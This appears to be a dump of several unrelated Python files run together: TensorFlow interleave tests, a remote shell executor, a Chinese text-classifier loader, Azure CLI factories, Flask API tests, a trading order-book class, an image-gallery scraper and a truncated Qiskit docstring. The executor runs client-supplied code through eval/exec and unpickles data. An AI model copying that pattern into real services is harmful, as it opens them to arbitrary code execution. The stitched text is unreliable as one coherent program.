coordination_events = {i: threading.Event() for i in input_values} def map_py_fn(x): coordination_events[x].wait() coordination_events[x].clear() return x * x def map_fn(x): return script_ops.py_func(map_py_fn, [x], x.dtype) def interleave_fn(x): dataset = dataset_ops.Dataset.from_tensors(x) dataset = dataset.repeat(x) return dataset.map(map_fn) options = dataset_ops.Options() options.experimental_deterministic = False dataset = dataset_ops.Dataset.from_tensor_slices(input_values).repeat( 2).interleave(interleave_fn, cycle_length, block_length, num_parallel_calls).with_options(options) iterator = dataset.make_one_shot_iterator() get_next = iterator.get_next() return get_next, coordination_events def _repeat(values, count): """Produces a list of lists suitable for testing interleave. Args: values: for each element `x` the result contains `[x] * x` count: determines how many times to repeat `[x] * x` in the result Returns: A list of lists of values suitable for testing interleave. """ return [[value] * value for value in np.tile(values, count)] class InterleaveDatasetTest(test_base.DatasetTestBase, parameterized.TestCase): @parameterized.named_parameters( ("1", [4, 5, 6], 1, 1, [ 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6 ]), ("2", [4, 5, 6], 2, 1, [ 4, 5, 4, 5, 4, 5, 4, 5, 5, 6, 6, 4, 6, 4, 6, 4, 6, 4, 6, 5, 6, 5, 6, 5, 6, 5, 6, 5, 6, 6 ]), ("3", [4, 5, 6], 2, 3, [ 4, 4, 4, 5, 5, 5, 4, 5, 5, 6, 6, 6, 4, 4, 4, 6, 6, 6, 4, 5, 5, 5, 6, 6, 6, 5, 5, 6, 6, 6 ]), ("4", [4, 5, 6], 7, 2, [ 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 4, 4, 5, 5, 6, 6, 5, 6, 6, 5, 6, 6 ]), ("5", [4, 0, 6], 2, 1, [4, 4, 6, 4, 6, 4, 6, 6, 4, 6, 4, 6, 4, 4, 6, 6, 6, 6, 6, 6]), ) def testPythonImplementation(self, input_values, cycle_length, block_length, expected_elements): input_lists = _repeat(input_values, 2) for expected, produced in zip( expected_elements, _interleave(input_lists, cycle_length, block_length)): self.assertEqual(expected, produced) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 1, 3, None), ("2", np.int64([4, 5, 6]), 1, 3, 1), ("3", np.int64([4, 5, 6]), 2, 1, None), ("4", np.int64([4, 5, 6]), 2, 1, 1), ("5", np.int64([4, 5, 6]), 2, 1, 2), ("6", np.int64([4, 5, 6]), 2, 3, None), ("7", np.int64([4, 5, 6]), 2, 3, 1), ("8", np.int64([4, 5, 6]), 2, 3, 2), ("9", np.int64([4, 5, 6]), 7, 2, None), ("10", np.int64([4, 5, 6]), 7, 2, 1), ("11", np.int64([4, 5, 6]), 7, 2, 3), ("12", np.int64([4, 5, 6]), 7, 2, 5), ("13", np.int64([4, 5, 6]), 7, 2, 7), ("14", np.int64([]), 2, 3, None), ("15", np.int64([0, 0, 0]), 2, 3, None), ("16", np.int64([4, 0, 6]), 2, 3, None), ("17", np.int64([4, 0, 6]), 2, 3, 1), ("18", np.int64([4, 0, 6]), 2, 3, 2), ) def testInterleaveDataset(self, input_values, cycle_length, block_length, num_parallel_calls): count = 2 dataset = dataset_ops.Dataset.from_tensor_slices(input_values).repeat( count).interleave( lambda x: dataset_ops.Dataset.from_tensors(x).repeat(x), cycle_length, block_length, num_parallel_calls) get_next = dataset.make_one_shot_iterator().get_next() with self.cached_session() as sess: for expected_element in _interleave( _repeat(input_values, count), cycle_length, block_length): self.assertEqual(expected_element, sess.run(get_next)) for _ in range(2): with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.float32([1., np.nan, 2., np.nan, 3.]), 1, 3, None), ("2", np.float32([1., np.nan, 2., np.nan, 3.]), 1, 3, 1), ("3", np.float32([1., np.nan, 2., 
np.nan, 3.]), 2, 1, None), ("4", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 1, 1), ("5", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 1, 2), ("6", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, None), ("7", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, 1), ("8", np.float32([1., np.nan, 2., np.nan, 3.]), 2, 3, 2), ("9", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, None), ("10", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 1), ("11", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 3), ("12", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 5), ("13", np.float32([1., np.nan, 2., np.nan, 3.]), 7, 2, 7), ) def testInterleaveDatasetError(self, input_values, cycle_length, block_length, num_parallel_calls): dataset = dataset_ops.Dataset.from_tensor_slices(input_values).map( lambda x: array_ops.check_numerics(x, "message")).interleave( dataset_ops.Dataset.from_tensors, cycle_length, block_length, num_parallel_calls) get_next = dataset.make_one_shot_iterator().get_next() with self.cached_session() as sess: for value in input_values: if np.isnan(value): with self.assertRaises(errors.InvalidArgumentError): sess.run(get_next) else: self.assertEqual(value, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) def testInterleaveSparse(self): def _map_fn(i): return sparse_tensor.SparseTensorValue( indices=[[0, 0], [1, 1]], values=(i * [1, -1]), dense_shape=[2, 2]) def _interleave_fn(x): return dataset_ops.Dataset.from_tensor_slices( sparse_ops.sparse_to_dense(x.indices, x.dense_shape, x.values)) iterator = ( dataset_ops.Dataset.range(10).map(_map_fn).interleave( _interleave_fn, cycle_length=1).make_one_shot_iterator()) get_next = iterator.get_next() with self.cached_session() as sess: for i in range(10): for j in range(2): expected = [i, 0] if j % 2 == 0 else [0, -i] self.assertAllEqual(expected, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 2, 1, 1), ("2", np.int64([4, 5, 6]), 2, 1, 2), ("3", np.int64([4, 5, 6]), 2, 3, 1), ("4", np.int64([4, 5, 6]), 2, 3, 2), ("5", np.int64([4, 5, 6]), 3, 2, 1), ("6", np.int64([4, 5, 6]), 3, 2, 2), ("7", np.int64([4, 5, 6]), 3, 2, 3), ("8", np.int64([4, 0, 6]), 2, 3, 1), ("9", np.int64([4, 0, 6]), 2, 3, 2), ) def testSloppyInterleaveInOrder(self, input_values, cycle_length, block_length, num_parallel_calls): get_next, coordination_events = _make_coordinated_sloppy_dataset( input_values, cycle_length, block_length, num_parallel_calls) config = config_pb2.ConfigProto( inter_op_parallelism_threads=num_parallel_calls + 1, use_per_session_threads=True) with self.cached_session(config=config) as sess: for expected_element in _interleave( _repeat(input_values, 2), cycle_length, block_length): coordination_events[expected_element].set() self.assertEqual(expected_element * expected_element, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) @parameterized.named_parameters( ("1", np.int64([4, 5, 6]), 2, 1, 2), ("2", np.int64([4, 5, 6]), 2, 3, 2), ("3", np.int64([4, 5, 6]), 3, 2, 3), ("4", np.int64([4, 0, 6]), 2, 3, 2), ) def testSloppyInterleaveOutOfOrder(self, input_values, cycle_length, block_length, num_parallel_calls): get_next, coordination_events = _make_coordinated_sloppy_dataset( input_values, cycle_length, block_length, num_parallel_calls) config = config_pb2.ConfigProto( inter_op_parallelism_threads=num_parallel_calls + 1, use_per_session_threads=True) with self.cached_session(config=config) as 
sess: elements = [ x for x in _interleave( _repeat(input_values, 2), cycle_length, block_length) ] for i in [1, 4, 7]: elements[i], elements[i + 1] = elements[i + 1], elements[i] for element in elements: coordination_events[element].set() self.assertEqual(element * element, sess.run(get_next)) with self.assertRaises(errors.OutOfRangeError): sess.run(get_next) if __name__ == "__main__": test.main() ''' This module provides implementation for runtime executors. Public interfaces: Executor, RequireInput Usage: >>> s = ShellServer(5000) >>> e = s._executor # internal use only >>> e.prepare() >>> e.execute('print("hello, world!")').stdout() "hello, world!\n" >>> e.restore() ''' from typing import Optional, Any, AnyStr from types import BuiltinFunctionType, FunctionType from io import StringIO from config import default_config import pickle, sys, traceback __all__ = ['Executor', 'RequireInput'] config = default_config() HELPMSG = '\n'.join(config.get('shell.helpmsg')) def pack_data(data: Any) -> Any: 'Packs the data into serializable object.' if data is None or isinstance(data, (str, int, bytes, bytearray, RequireInput)): return data elif isinstance(data, (tuple, list)): r = [] for item in data: r.append(pack_data(item)) return r elif isinstance(data, dict): d = {} for k, v in data.items(): d[pack_data(k)] = pack_data(v) return d elif isinstance(data, BuiltinFunctionType) and data.__module__ == 'builtins': # only keep builtin function from 'builtins' module return data else: return RemoteObjectRef(data) def pack_error(error: Exception) -> Any: 'Packs a remote error traceback.' return RemoteException(error) def special_ref(obj: Any) -> Optional[str]: 'Gets a special reference name of the object.' if obj.__class__.__name__ in [ 'type', 'function', 'method', 'generator', 'async_generator', 'coroutine', 'getset_descriptor', 'method-wrapper', 'module', 'method_descriptor', 'wrapper_descriptor' ]: return obj.__name__ return None class RemoteException: 'Represents a remote exception.' def __init__(self, error: Exception): self._traceback = ''.join(traceback.format_exception(error.__class__, error, error.__traceback__)) def __getstate__(self): return { 'traceback': self._traceback } def __setstate__(self, state): self._traceback = state['traceback'] def printTraceback(self): 'Prints the traceback of the exception.' print(self._traceback.strip()) class RequireInput: 'Serializable object representing a request of input.' class RemoteObjectRef: 'Represents a reference of a remote object. Also serializable.' def __init__(self, obj: Any): self._class = obj.__class__.__name__ self._address = id(obj) self._name = special_ref(obj) def __repr__(self): if self._name is not None: return '' % (self._class, self._name) return '' % (self._class, '0x' + hex(self._address)[2:].upper()) def __getstate__(self): return { 'class': self._class, 'address': self._address, 'name': self._name } def __setstate__(self, state): self._class = state['class'] self._address = state['address'] self._name = state['name'] class ExecutionResult: 'Represents an execution result. This class is serializable.' def __init__(self, success: bool=True, data: Any=None, error: Optional[Exception]=None, stdout: str=''): if not success and not error: raise ValueError("error must be provided when failure.") self._success = success if error is not None: self._error = pack_error(error) else: self._error = None self._stdout = stdout self._data = data def pack(self) -> bytes: 'Packs this instance into bytes.' 
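# Illustrative note (not part of the original module): pack() and the unpack()
# staticmethod below form a pickle round trip; the captured stdout survives it, so
# for an ExecutionResult r:
#     ExecutionResult.unpack(r.pack()).stdout() == r.stdout()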
return pickle.dumps({ 'success': self._success, 'error': self._error, 'stdout': self._stdout, 'data': pack_data(self._data) }) @staticmethod def unpack(data: bytes) -> 'ExecutionResult': 'Unpacks an instance from provided binary data.' data = pickle.loads(data) result = ExecutionResult.__new__(ExecutionResult) result._success = data['success'] result._error = data['error'] result._stdout = data['stdout'] result._data = data['data'] return result def stdout(self) -> str: 'Gets the standard output of this result.' return self._stdout def success(self) -> bool: 'Whether this operation succeeded.' return self._success def error(self) -> Optional[RemoteException]: 'Gets the error of this result.' return self._error def data(self) -> Any: 'Gets the data of this result.' return self._data class RuntimeStdin: 'Runtime standard input file.' def __init__(self, server: 'server.ShellServer', stdout: 'RuntimeStdout'): self._buffer = '' self._server = server self._stdout = stdout def read(self, n: int) -> str: 'Reads specific amount of chars. Requests input if buffer is insufficient.' if len(self._buffer) < n: self._requireInput() data, self._buffer = self._buffer[:n], self._buffer[n:] return data def readline(self) -> str: 'Reads a line of chars. Requests input if buffer is insufficient.' if not self._buffer: self._requireInput() data, *buffer = self._buffer.split('\n', 1) self._buffer = buffer[0] if buffer else '' return data def _requireInput(self) -> None: 'Requests input from client.' self.put(self._server.requireInput(self._stdout.get())) def put(self, data: str) -> None: 'Put characters into buffer.' self._buffer += data def noop(self) -> None: 'No operation needed.' flush = close = noop class RuntimeStdout: 'Runtime standard output file.' def __init__(self): self._buffer = '' def write(self, data: str) -> None: 'Writes data to buffer.' self._buffer += data def get(self) -> str: 'Gets the data written to the buffer.' data, self._buffer = self._buffer, '' return data def noop(self) -> None: 'No operation needed.' flush = close = noop class Executor: 'Represents the code executor of the server.' def __init__(self, server: 'server.ShellServer'): self._scope = {} self._stdout = RuntimeStdout() self._stdin = RuntimeStdin(server, self._stdout) self._server = server def prepare(self) -> None: 'Prepare to execute. Redirects stdin and stdout.' sys.stdin = self._stdin sys.stdout = self._stdout def restore(self) -> None: 'Restore sys.stdin and sys.stdout.' sys.stdin = sys.__stdin__ sys.stdout = sys.__stdout__ def execute(self, statement: AnyStr) -> ExecutionResult: 'Execute the code using eval and exec. Returns an execution result.' if isinstance(statement, bytes): statement = statement.decode() if statement.startswith('#:'): # meta command: return self.metacommand(statement[2:]) try: return ExecutionResult(True, eval(statement, self._scope), None, self._stdout.get()) except SyntaxError: pass except Exception as e: return ExecutionResult(False, None, e, self._stdout.get()) try: exec(statement, self._scope) return ExecutionResult(True, None, None, self._stdout.get()) except Exception as e: return ExecutionResult(False, None, e, self._stdout.get()) def metacommand(self, cmd: AnyStr) -> ExecutionResult: 'Execute a metacommand.' 
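# Illustrative note (not part of the original module; assumes an Executor instance
# `e` as in the module docstring): execute() above first tries eval() so that
# expressions produce a return value, and falls back to exec() when eval() raises
# SyntaxError:
#     e.execute('1 + 1').data()    # eval path -> 2
#     e.execute('x = 1').data()    # exec path -> None (x is stored in the scope)
#     e.execute('#:help')          # '#:' prefix is dispatched to metacommand() below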
cmd = cmd.strip().lower() if isinstance(cmd, bytes): cmd = cmd.decode() if cmd == 'mode.encrypt': self._server.switchMode('encrypt') return ExecutionResult(True) elif cmd == 'mode.signature': self._server.switchMode('signature') return ExecutionResult(True, None, None, "Warning: Swiching to insecure context.\n") elif cmd == 'mode': return ExecutionResult(True, None, None, self._server._mode+"\n") elif cmd == 'help': return ExecutionResult(True, None, None, HELPMSG) elif cmd == 'exit': self._server.abort() # no return return ExecutionResult(True, None, None, "No metacommand named %s\n" % cmd)# coding:utf-8 import numpy as np import re import itertools from collections import Counter import sys # import importlib # importlib.reload(sys) # reload(sys) # sys.setdefaultencoding("utf-8") # 剔除英文的符号 def clean_str(string): string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string) string = re.sub(r"\'s", " \'s", string) string = re.sub(r"\'ve", " \'ve", string) string = re.sub(r"n\'t", " n\'t", string) string = re.sub(r"\'re", " \'re", string) string = re.sub(r"\'d", " \'d", string) string = re.sub(r"\'ll", " \'ll", string) string = re.sub(r",", " , ", string) string = re.sub(r"!", " ! ", string) string = re.sub(r"\(", " \( ", string) string = re.sub(r"\)", " \) ", string) string = re.sub(r"\?", " \? ", string) string = re.sub(r"\s{2,}", " ", string) return string.strip().lower() def load_data_and_labels(jisuanji_data_file, jiaotong_data_file): """ 加载二分类训练数据,为数据打上标签 (X,[0,0]) X = 【 日 期 】19960104 【 版 号 】1 【 标 题 】合巢芜高速公路巢芜段竣工 【 作 者 】彭建中 【 正 文 】 安徽合(肥)巢(湖)芜(湖)高速公路巢芜段日前竣工通车并投入营运。合巢芜 高速公路是国家规划的京福综合运输网的重要干线路段,是交通部确定1995年建成 的全国10条重点公路之一。该条高速公路正线长88公里。(彭建中) Y = 交通 0:交通---> [1,0] 1:计算机--->[0,1] (X,Y) """ jisuanji_examples = list(open(jisuanji_data_file, "r", encoding="utf-8").readlines()) jisuanji_examples = [s.strip() for s in jisuanji_examples] jiaotong_exampless = list(open(jiaotong_data_file, "r", encoding="utf-8").readlines()) jiaotong_exampless = [s.strip() for s in jiaotong_exampless] x_text = jisuanji_examples + jiaotong_exampless # 适用于英文 # x_text = [clean_str(sent) for sent in x_text] x_text = [sent for sent in x_text] # 定义类别标签 ,格式为one-hot的形式: y=1--->[0,1] positive_labels = [[0, 1] for _ in jisuanji_examples] # print positive_labels[1:3] negative_labels = [[1, 0] for _ in jiaotong_exampless] y = np.concatenate([positive_labels, negative_labels], 0) """ print y [[0 1] [0 1] [0 1] ..., [1 0] [1 0] [1 0]] print y.shape (10662, 2) """ return [x_text, y] def batch_iter(data, batch_size, num_epochs, shuffle=True): """ 利用迭代器从训练数据会取某一个batch的数据 """ data = np.array(data) data_size = len(data) num_batches_per_epoch = int((len(data)-1)/batch_size) + 1 for epoch in range(num_epochs): # 每回合打乱顺序 if shuffle: # 随机产生以一个乱序数组,作为数据集数组的下标 shuffle_indices = np.random.permutation(np.arange(data_size)) shuffled_data = data[shuffle_indices] else: shuffled_data = data # 划分批次 for batch_num in range(num_batches_per_epoch): start_index = batch_num * batch_size end_index = min((batch_num + 1) * batch_size, data_size) yield shuffled_data[start_index:end_index] # 测试代码用的 if __name__ == '__main__': jisuanji_data_file = './fenci/jisuanji200.txt' jiaotong_data_file = './fenci/jiaotong214.txt' load_data_and_labels(jisuanji_data_file, jiaotong_data_file) src/peering/azext_peering/generated/_client_factory.py100-1000 # -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. 
See License.txt in the project root for # license information. # # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- def cf_peering_base(cli_ctx, *_): from azure.cli.core.commands.client_factory import get_mgmt_service_client from ..vendored_sdks.peering import PeeringManagementClient return get_mgmt_service_client(cli_ctx, PeeringManagementClient) def cf_legacy_peering(cli_ctx, *_): return cf_peering_base(cli_ctx).legacy_peering def cf_peer_asn(cli_ctx, *_): return cf_peering_base(cli_ctx).peer_asn def cf_peering_location(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_location def cf_registered_asn(cli_ctx, *_): return cf_peering_base(cli_ctx).registered_asn def cf_registered_prefix(cli_ctx, *_): return cf_peering_base(cli_ctx).registered_prefix def cf_peering(cli_ctx, *_): return cf_peering_base(cli_ctx).peering def cf_received_route(cli_ctx, *_): return cf_peering_base(cli_ctx).received_route def cf_peering_service_country(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_country def cf_peering_service_location(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_location def cf_prefix(cli_ctx, *_): return cf_peering_base(cli_ctx).prefix def cf_peering_service_provider(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service_provider def cf_peering_service(cli_ctx, *_): return cf_peering_base(cli_ctx).peering_service 0 import os from datetime import datetime import unittest import json from flask_sqlalchemy import SQLAlchemy from main import app from main import db import http.client API_PREFIX = "/api/v1" CLIENT_SECRET = os.environ['CLIENT_SECRET'] CLIENT_ID = os.environ['CLIENT_ID'] class FitAppTestSuite(unittest.TestCase): @classmethod def setUpClass(cls): # Setup Authentication. 
Only need to execute once conn = http.client.HTTPSConnection("as12production.auth0.com") payload = { "client_id": CLIENT_ID, "client_secret": CLIENT_SECRET, "audience": "Fit-API", "grant_type": "client_credentials" } headers = {'content-type': "application/json"} conn.request("POST", "/oauth/token", json.dumps(payload), headers) res = conn.getresponse() data = res.read() cls.subject = f"{CLIENT_ID}@clients" cls.token = json.loads(data.decode("utf-8"))['access_token'] def setUp(self): """Define test variables and initialize app.""" self.app = app db.drop_all() db.create_all() self.client = self.app.test_client # binds the app to the current context with self.app.app_context(): self.db = SQLAlchemy() def tearDown(self): """Executed after reach test""" pass """ Global Endpoints """ def test_invalid_url(self): response = self.client().get('/invalid', follow_redirects=True) self.assertEqual(response.status_code, 404) def test_health_endpoint(self): response = self.client().get(f'{API_PREFIX}/health', follow_redirects=True) self.assertEqual(response.status_code, 200) """ User Endpoints """ """ GET /users """ def test_get_user(self): response = self.client().get(f'{API_PREFIX}/users', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) def test_get_user_no_auth(self): response = self.client().get(f'{API_PREFIX}/users', follow_redirects=True) self.assertEqual(response.status_code, 401) """ POST & DELETE /users """ def test_post_user_invalid_weight(self): data = { "target_weight": -20, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) def test_post_user_bad_weight(self): data = { "target_weight": 0, "height": -20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) def test_post_user_no_auth(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, follow_redirects=True) self.assertEqual(response.status_code, 401) def test_post_and_delete_user(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) # Cannot post same user twice response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) response = self.client().get(f'{API_PREFIX}/users', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) self.assertEqual(json.loads(response.data)['count'], 1) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 404) """ PATCH /users """ def test_patch_user(self): data = { 
"target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) data = { "target_weight": -10, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) data = { "target_weight": 10, "height": -20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 422) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) def test_patch_no_user(self): data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 404) def test_patch_different_user(self): data = { "target_weight": 25, "height": 20, "city": "Grapevine", "state": "Texas" } response = self.client() \ .patch(f'{API_PREFIX}/users/1234', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 403) """ GET /progress """ def test_get_all_progress(self): response = self.client() \ .get(f'{API_PREFIX}/progress', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) response = self.client().get(f'{API_PREFIX}/progress', follow_redirects=True) self.assertEqual(response.status_code, 401) """ GET /progress/{id} """ def test_get_progress(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) response = self.client() \ .get(f'{API_PREFIX}/progress/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 200) response = self.client() \ .get(f'{API_PREFIX}/progress/1234', follow_redirects=True, headers={ "Authorization": f"Bearer {self.token}"}) self.assertEqual(response.status_code, 403) response = self.client() \ .get(f'{API_PREFIX}/progress/{self.subject}', follow_redirects=True) self.assertEqual(response.status_code, 401) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) """ POST/PATCH /progress/{id} """ def test_post_patch_progress(self): data = { "target_weight": 0, "height": 20, "city": "string", "state": "string" } response = self.client() \ .post(f'{API_PREFIX}/users', json=data, headers={ 
"Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data = { "track_date": datetime.today().date().strftime('%Y-%m-%d'), "weight": 255, "mood": "neutral", "diet": "neutral" } response = self.client() \ .post(f'{API_PREFIX}/progress/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 201) data["weight"] = 500 response = self.client() \ .patch(f'{API_PREFIX}/progress/{self.subject}', json=data, headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) response = self.client() \ .post(f'{API_PREFIX}/progress/1234', follow_redirects=True, headers={ "Authorization": f"Bearer {self.token}"}) self.assertEqual(response.status_code, 403) response = self.client() \ .patch(f'{API_PREFIX}/progress/{self.subject}', follow_redirects=True) self.assertEqual(response.status_code, 401) response = self.client() \ .delete(f'{API_PREFIX}/users/{self.subject}', headers={ "Authorization": f"Bearer {self.token}"}, follow_redirects=True) self.assertEqual(response.status_code, 204) # Make the tests conveniently executable if __name__ == "__main__": unittest.main() BGTCapital/hummingbothummingbot/connector/exchange/beaxy/beaxy_order_book_message.py import time from typing import Dict, List, Optional from hummingbot.core.data_type.order_book_row import OrderBookRow from hummingbot.core.data_type.order_book_message import OrderBookMessage, OrderBookMessageType class BeaxyOrderBookMessage(OrderBookMessage): def __new__( cls, message_type: OrderBookMessageType, content: Dict[str, any], timestamp: Optional[float] = None, *args, **kwargs, ): if timestamp is None: if message_type is OrderBookMessageType.SNAPSHOT: raise ValueError('timestamp must not be None when initializing snapshot messages.') timestamp = int(time.time()) return super(BeaxyOrderBookMessage, cls).__new__( cls, message_type, content, timestamp=timestamp, *args, **kwargs ) @property def update_id(self) -> int: return int(str(self.content['sequenceNumber'])) @property def trade_id(self) -> int: return int(self.timestamp * 1e3) def _entries(self, side): return [ OrderBookRow(entry['price'], entry['quantity'], self.update_id) if entry['action'] != 'DELETE' else OrderBookRow(entry['price'], 0, self.update_id) for entry in self.content.get('entries', []) if entry['side'] == side ] @property def asks(self) -> List[OrderBookRow]: return self._entries('ASK') @property def bids(self) -> List[OrderBookRow]: return self._entries('BID') @property def has_update_id(self) -> bool: return True @property def has_trade_id(self) -> bool: return True def __eq__(self, other) -> bool: return self.type == other.type and self.timestamp == other.timestamp def __lt__(self, other) -> bool: if self.timestamp != other.timestamp: return self.timestamp < other.timestamp else: """ If timestamp is the same, the ordering is snapshot < diff < trade """ return self.type.value < other.type.value kittenparry/old-stuffpython/16-04-17 girlsreleased crawler.py import time from bs4 import BeautifulSoup import urllib.request import dryscrape import os def sign(): print('######################################') print('######################################') print('### girlsreleased img downloader ###') print('### ###') print('### ###') print('### ###') print('######################################') print('######################################') agent = {'User-Agent': 'Mozilla/5.0'} def 
replay(): rp = input('#again? (y/n)') rp2 = rp.lower() if rp2 == 'y': crawl() elif rp2 == 'n': print('#shutting down') else: print('#type y or n') replay() def crawl(mp = 1): galurl = input('#gallery url:') print('#checking the url') strippedurl = galurl.strip() splitgurl = strippedurl.split('.com', 1) first = splitgurl[0] if first == 'https://girlsreleased': second = splitgurl[1].split('=', 1)[0] if second == '/?setid': print('#done') else: print('#not a gallery link eg. /?setid=...') replay() return None else: print('#not a girlsreleased page') replay() return None page = 1 foldername = strippedurl.split('=', 1)[1] path = foldername + '/' print('#checking for path ' + path) if not os.path.exists(path): os.makedirs(path) else: print('#path already exists') replay() return None print('#proceding..') session = dryscrape.Session() session.visit(strippedurl) response = session.body() soup = BeautifulSoup(response) while page <= mp: print('#getting galthumb') try: for galthumb in soup.findAll('div', {'class':'gallerythumbbox'}): print('#getting imghref') for img in galthumb.findAll('a'): imghref = img.get('href') get_imgs(imghref, path) except: print('##error') page += 1 def get_imgs(url, path, mp = 1): imghref = url page = 1 print('#loading img page..') session = dryscrape.Session() session.visit(imghref) response = session.body() soup = BeautifulSoup(response) time.sleep(5) while page <= mp: print('#getting imglink') failcount = 0 try: for imglink in soup.findAll('img', {'id': 'thepic'}): print('#downloading img..') root = imghref.split('img.php?', 1)[0] name = str(imglink.get('alt')) splitname = name.split('/', 2)[2] pathname = path + splitname src = root + imglink.get('src') t = time.time() urllib.request.urlretrieve(src, pathname) t2 = str(time.time() - t) t3 = t2[:4] print('#downloaded ' + splitname) print('#in ' + t3 + ' seconds') print('#waiting..') except: failcount += 1 print('#failed: total ' + str(failcount)) page +=1 sign() crawl() TimSweering/PolyReach #!/usr/bin/env python from scripts.ReachabilityAlgorithm import PolyReach from matplotlib import pyplot as plt import sys PolyReach.plot_trajectory_from_file(sys.argv[1]) plt.show()# This code is part of Qiskit. # # (C) Copyright IBM 2019, 2021. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """The Variational Algorithm Base Class. This class can be used an interface for working with Variation Algorithms, such as VQE, QAOA, or QSVM, and also provides helper utilities for implementing new variational algorithms. Writing a new variational algorithm is a simple as extending this class, implementing a cost function for the new algorithm to pass to the optimizer, and running :meth:`find_minimum` method of this class to carry out the optimization. Alternatively, all of the functions below can be overridden to opt-out of this infrastructure but still meet the interface requirements. .. note:: This component has some function that is normally random. If you want to reproduce behavior then you should set the random number generator seed in the algorithm_globals (``qiskit.utils.algorithm_globals.random_seed = seed``). 
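Illustrative sketch (not part of the original Qiskit documentation; the subclass
name ``SketchVQA`` and the toy cost function are hypothetical, and the names
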